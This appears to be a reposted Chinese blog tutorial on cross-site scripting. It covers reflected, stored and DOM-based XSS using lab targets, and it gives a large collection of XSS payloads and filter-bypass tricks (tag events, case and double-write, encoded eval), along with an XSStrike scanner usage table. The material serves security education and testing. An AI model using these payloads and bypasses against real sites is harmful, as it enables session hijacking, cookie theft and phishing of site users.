自学内容网 自学内容网

【Web安全】XSS攻击与绕过

【Web安全】XSS攻击与绕过

【Web安全靶场】xss-labs-master 1-20

1. XSS攻击是啥?

XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到网页中,以便在用户的浏览器上执行。这些恶意脚本通常是JavaScript代码(当然不限于js代码,java,vbscript,activeX,Flash,HTML也能够构造攻击),可以利用浏览器的漏洞来窃取用户信息、篡改网页内容、跳转到恶意网站等。

XSS攻击的原理是通过在网页中注入恶意脚本,这些脚本会在用户浏览该网页时执行。攻击者可以利用各种方式将恶意脚本注入到网页中,包括在输入框中输入恶意代码、通过URL参数传递恶意脚本、利用未经过滤的用户输入等。

XSS攻击的危害包括但不限于:

  1. 网络钓鱼、盗取用户信息如Cookie
  2. 弹出广告页面,获取相关利益。
  3. 劫持用户会话,执行任意操作
  4. 传播蠕虫病毒。

2. XSS如何发生?

例如:<input type=“text” name=“name” value=“”>
当用户输入不是正常想要输入的内容,而是输入一串代码:“/><script>alert(document.cookie)</script>。
变成:<input type=“text” name=“name” value=”“/><script>alert(document.cookie)</script>”>从而代码就会执行。这个过程中涉及构造闭合,构造js代码。

常见的XSS发生位置有评论区,留言区,个人信息等,这些都能够存储在服务器的并且大规模传播的风险比较高,因为不同用户只要看到这个页面就会触发脚本攻击,管理员也是。同样的中低风险,常见于私信、搜索框、URL、筛选等,这些可以构造特定用户攻击、网络钓鱼等。

3. XSS分类

XSS攻击常见分三类:反射性、存储型、DOM型

3.1. 反射型

反射型XSS的原理就是将用户输入的内容作为代码让浏览器执行,一般需要引诱用户访问攻击者构建的URL。这种类型的攻击指发生在客户端上,并且需要访问带有恶意的参数特制的URL,所以也称之为非持久型XSS。

  1. 攻击者构造了一个包含恶意代码的URL并把它发给受害者,比如说发送受害者信息。
  2. 受害者点击攻击者构造的URL,网站执行并响应
  3. 受害者浏览器执行响应中的恶意脚本,将受害者的cookies信息发给攻击者服务器。

比如说xss-labs第一关http://192.168.255.128/xss-labs-master/level1.php?name=<script>alert(document.cookie)</script>,参数name后面是攻击者构建的代码,这一串代码的作用是弹出cookie信息,当然也可以让它发送到特定网站,攻击者只要柔诱导受害者点击这个信息就会产生攻击。

3.2. 存储型

存储型XSS是将脚本永远嵌入某一个页面中,当用户访问的时候就会触发执行,从而用户受到相关的攻击。并且该类型的攻击主要发生在服务端,所有用户访问该页面都将受到相应的攻击,所以也称之为持久型XSS。

  1. 攻击者利用网站的一个表单(比如说评论区、留言区),将恶意字符串即脚本代码插入到网站数据库中。
  2. 受害者向网站请求页面,网站产生响应,引入恶意字符串发送给受害者。
  3. 受害者浏览器识别出这时脚本代码,并执行。

比如说pikachu靶场的存储型XSS,我们把**hahahaha<script>alert(“xss”)/script>**发送到留言板,查看源代码发现js代码成功嵌入。

在这里插入图片描述

3.3. DOM型

DOM型XSS攻击(Document Object Model Cross-Site Scripting)是一种特殊的XSS攻击,其原理是利用客户端浏览器对DOM(文档对象模型)的操作进行攻击。与传统的XSS攻击不同,DOM型XSS攻击不需要服务器端的参与,而是完全在客户端执行。

DOM型XSS攻击的主要原理是攻击者通过构造恶意URL,向目标网页传递参数,然后在客户端浏览器中执行恶意脚本。当目标网页的JavaScript代码解析URL参数并将其插入到DOM中时,如果没有对参数进行适当的过滤和处理,就可能导致恶意脚本的执行。

可以说和反射型xss区别不大,只不过DOM没有于服务器进行交互,完全是在前端进行的。

例如pikachu的XSS-DOM,抓包试试,完全没有任何数据包:

在这里插入图片描述

4. XSS攻击方式

1. script标签

<script>alert("xss");</script>

注释:这是最基本的XSS攻击形式。通过插入<script>标签,攻击者可以在受害者的浏览器上执行任意JavaScript代码。在这个例子中,它会显示一个警告框,显示消息"xss"。

2. img标签

<img src=1 onerror=alert("xss")>

注释:利用<img>标签的onerror事件。如果图片加载失败(例如,src设置为不存在的资源),则执行onerror中的JavaScript代码。

3. input标签

<input onblur=alert("xss") autofocus><input autofocus>
<input onfocus=alert("xss")>
<input onclick=alert("xss")>
<input onmouseover=alert("xss")>

注释:通过在<input>标签的事件处理器中嵌入代码。例如,onblur事件在元素失去焦点时触发,onfocus在元素获得焦点时触发,onclick在点击时触发,onmouseover在鼠标悬停时触发。

4. details标签

<details ontoggle=alert("xss");>

注释:利用HTML5的<details>标签,当用户切换显示/隐藏详情时,触发ontoggle事件。

5. svg标签

<svg onload=alert("xss")>

注释:使用SVG图像格式的<svg>标签。onload事件在SVG加载完成时触发,可以用于执行恶意代码。

6. select标签

<select onfocus=alert("xss")></select>
<select onfocus=alert("xss") autofocus>

注释:在<select>标签中使用onfocus事件。当下拉列表获得焦点时,触发JavaScript代码。

7. iframe标签

<iframe onload=alert("xss")></iframe>

注释:利用<iframe>标签的onload事件。当iframe加载完成后,执行指定的JavaScript代码。

8. video标签

<video><source onerror=alert("xss")>

注释:通过<video>标签中的<source>元素的onerror事件。如果视频源文件加载失败,将执行错误处理代码。

9. audio标签

<audio src=1 onerror=alert("xss")>

注释:与<img>标签类似,这里使用<audio>标签的onerror事件来执行代码。如果音频文件加载失败,将触发onerror事件。

10. body标签

<body onload=alert("xss")>

注释:在HTML的<body>标签的onload事件中嵌入代码。当页面加载完成时,会执行此代码。

11. textarea标签

<textarea onfocus=alert("xss"); autofocus>

注释:使用<textarea>元素的onfocus事件。当文本区域获得焦点时,将执行指定的JavaScript代码。

5. 常见绕过方式

这里只是列举出常见的,详细看这个XSS攻击绕过过滤方法大全(转)

1. 空格过滤

当空格被过滤了,可以用**/和注释符**代替空格,

<img/src="x"/onerror=alert(1);>
<img/**/src="x"/**/onerror=alert(1);>

2. 引号过滤

在html中可以不使用引号,在js中,可以用反引号代替单双引号

<img src=x onerror=alert(`xss`);>
除了单引号其他都被编码,可以试试onclick

3. 括号过滤

当括号被过滤的时候可以使用throw来绕过。throw 语句用于当错误发生时抛出一个错误。(末尾有解释)

<img src=x onerror="javascript:window.onerror=alert;throw 1">
<a onmouseover="javascript:window.onerror=alert;throw 1>

4. 关键词过滤

关键词过滤可能可以使用大小写绕过、双写绕过、字符串拼接绕过

<sCRiPt>alert(1);</sCrIpT>
<scrscriptipt>alert(1);</scrscriptipt>
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">  反引号代替单双引号

5. 编码绕过

使用Unicode、url、Ascii、hex、base64绕过

// Unicode
javasc&#x72;&#x69;pt:alert(/xss/)     (编码了r和i)
// url
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
// Ascii
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
// hex
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
// base64
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">

6. url地址过滤

// 使用URL编码
// 十进制、八进制、十六进制IP
// 用//代替http://
// 使用中文句号代替英文点号

7. 伪协议

"><a href=javascript:alert(/xss/)>   o_n和<scr_ipt>过滤

6. xsstrike

版本:XSStrike v3.1.5

项目地址:

https://github.com/s0md3v/XSStrike
参数描述使用示例
-h, --help显示帮助信息并退出python3 xsstrike.py -h
-u TARGET, --url TARGET指定目标URLpython3 xsstrike.py -u http://example.com/111.php?q=123
--data PARAMDATA提供POST数据python3 xsstrike.py --data "username=admin"
-e ENCODE, --encode ENCODE有效载荷编码python3 xsstrike.py -e base64
--fuzzer启动模糊测试器python3 xsstrike.py --fuzzer
--update更新XSstrikepython3 xsstrike.py --update
--timeout TIMEOUT设置请求超时时间python3 xsstrike.py --timeout 10
--proxy使用代理服务器python3 xsstrike.py --proxy http://127.0.0.1:8080
--crawl爬行目标网站以发现更多页面python3 xsstrike.py --crawl
--json将POST数据视为JSONpython3 xsstrike.py --data '{"user":"admin"}' --json
--path在路径中注入有效Payloadpython3 xsstrike.py --url http://example.com --path
--seeds ARGS_SEEDS从文件加载URL作为种子python3 xsstrike.py --seeds urls.txt
-f ARGS_FILE, --file ARGS_FILE从文件加载有效Payloadpython3 xsstrike.py -f payloads.txt
-l LEVEL, --level LEVEL设置爬行深度级别python3 xsstrike.py --level 2
--headers [ADD_HEADERS]添加HTTP头部python3 xsstrike.py --headers "User-Agent: Custom"
-t THREADCOUNT, --threads THREADCOUNT设置线程数量python3 xsstrike.py --threads 5
-d DELAY, --delay DELAY设置请求之间的延迟时间python3 xsstrike.py --delay 1
--skip跳过确认对话框和PoC(概念验证)python3 xsstrike.py --skip
--skip-dom跳过DOM检查python3 xsstrike.py --skip-dom
--blind在爬行时注入盲目XSS有效Payloadpython3 xsstrike.py --blind
--console-log-level {DEBUG,INFO,RUN,GOOD,WARNING,ERROR,CRITICAL,VULN}设置控制台日志级别python3 xsstrike.py --console-log-level INFO
--file-log-level {DEBUG,INFO,RUN,GOOD,WARNING,ERROR,CRITICAL,VULN}设置文件日志级别python3 xsstrike.py --file-log-level DEBUG
--log-file LOG_FILE设置日志文件的名称python3 xsstrike.py --log-file xsstrike.log

原文地址:https://blog.csdn.net/likinguuu/article/details/136530759

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!